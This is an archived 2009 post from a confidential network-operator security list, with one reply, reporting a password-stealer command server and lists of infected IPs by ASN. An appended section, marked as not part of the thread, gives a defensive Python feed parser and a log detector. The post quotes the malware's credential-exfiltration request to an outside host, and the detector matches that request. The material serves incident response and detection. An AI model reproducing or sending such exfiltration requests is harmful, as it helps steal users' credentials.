[nsp-sec] ACK RE: 130K+ Infected IPs on ~3600 ASNs
Greenberg, David A
dgreenbe at iu.edu
Thu Oct 1 15:53:44 EDT 2009
ACK AS 87 Indiana University
The first one on our list is a linux machine doing some sort of malware research. The rest are all likely compromised computers.
David
-----Original Message-----
From: nsp-security-bounces at puck.nether.net [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
Sent: Thursday, October 01, 2009 1:48 PM
To: NSP-SEC List
Subject: [nsp-sec] 130K+ Infected IPs on ~3600 ASNs
----------- nsp-security Confidential --------
Hi Team,
This password stealer head end IP appears to be quite busy:
76.73.37.250
We're working w/ the ISP on takedown, however in the meantime here is a list
of 130K+ infected IPs seen talking to it primarily via TCP 80 (reporting
stolen credentials) and UDP 7006 - UDP 7012. I don't anticipate an IP
takedown to last forever because they can likely re-route via DNS.
ASN list:
https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
Infected IP list:
https://www.cymru.com/nsp-sec/Owned/stealer/
eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
Timestamps in UTC.
Some clarification on the formatting:
3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology
The timestamp column will begin with a U or a T. U is for UDP, T for TCP.
When possible we've preferred to list out a T if we have seen any TCP 80
traffic from the client IP in question.
It looks like the malware on the client may choose its source IP address
since we noticed some RFC 1918 traffic so it is possible the UDP data will
not match in all cases. I cannot guarantee that the UDP traffic is not part
of some type of actual software but it sure looks suspicious. Here is a
public URL for reference:
http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
As there is UDP involved we cannot guarantee that there are 0 spoofed IPs,
but on the TCP side that is another matter.
HTTP credential stealing looks something like this:
GET /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&p=STOLEN_PASSWORD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible).
Host: hotshows.org.
.
Cheers,
-- steve
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
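Added example, not part of the thread or of Team Cymru's tooling: a Python parser for the "ASN | IP | U/T timestamp | AS name" row layout described in the post, a filter that pulls out the rows a network operator would act on (own ASN, public source, TCP-confirmed first, since the post says T rows are preferred and UDP rows may carry malware-chosen RFC 1918 sources), and a check that flags the quoted "GET /pp2/?s=...&u=...&p=..." request shape in one's own proxy or web-server logs. The feed rows are constructed: the first is the post's own example, the second is synthetic.

```python
import ipaddress
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample rows in the layout quoted in the post: the first is the
# post's own example, the second is synthetic (an RFC 1918 source on a UDP
# row, which the post warns can appear because the malware may pick its source IP).
SAMPLE_FEED = [
    "3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology",
    "3 | 10.1.2.3 | U 2009/10/01 03:50:00.000000 | MIT-GATEWAYS - Massachusetts Institute of Technology",
]
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
FEED_RE = re.compile(r"^\s*(\d+)\s*\|\s*([\d.]+)\s*\|\s*([UT])\s+(\S+ \S+)\s*\|\s*(.*?)\s*$")

@dataclass
class FeedEntry:
    asn: int
    ip: str
    proto: str      # "tcp" (T: TCP/80 seen, higher confidence) or "udp" (U)
    seen: datetime  # the feed's timestamps are UTC
    as_name: str
    rfc1918: bool   # private source: unreliable, likely malware-chosen or spoofed

def parse_feed_line(line: str) -> Optional[FeedEntry]:
    """Parse one feed row; returns None for lines that do not match the layout."""
    m = FEED_RE.match(line)
    if m is None:
        return None
    asn, ip, flag, ts, name = m.groups()
    addr = ipaddress.ip_address(ip)
    return FeedEntry(
        asn=int(asn), ip=ip, proto="tcp" if flag == "T" else "udp",
        seen=datetime.strptime(ts, "%Y/%m/%d %H:%M:%S.%f").replace(tzinfo=timezone.utc),
        as_name=name, rfc1918=any(addr in net for net in RFC1918),
    )

def actionable_entries(lines, my_asn: int):
    """Rows for my ASN worth a ticket: public sources only, TCP-confirmed rows first."""
    rows = [e for e in map(parse_feed_line, lines) if e and e.asn == my_asn and not e.rfc1918]
    return sorted(rows, key=lambda e: (e.proto != "tcp", e.seen))

def is_credential_exfil(request_line: str) -> bool:
    """Flag the 'GET /pp2/?s=<site>&u=<user>&p=<pass>' request shape quoted in the post."""
    parts = request_line.split()
    if len(parts) != 3 or parts[0] != "GET":
        return False
    url = urlsplit(parts[1])
    return url.path == "/pp2/" and {"s", "u", "p"} <= set(parse_qs(url.query))
```

Feed the real per-ASN text files line by line to actionable_entries() with your own ASN, and run is_credential_exfil() over the request-line field of proxy or web logs for outbound traffic.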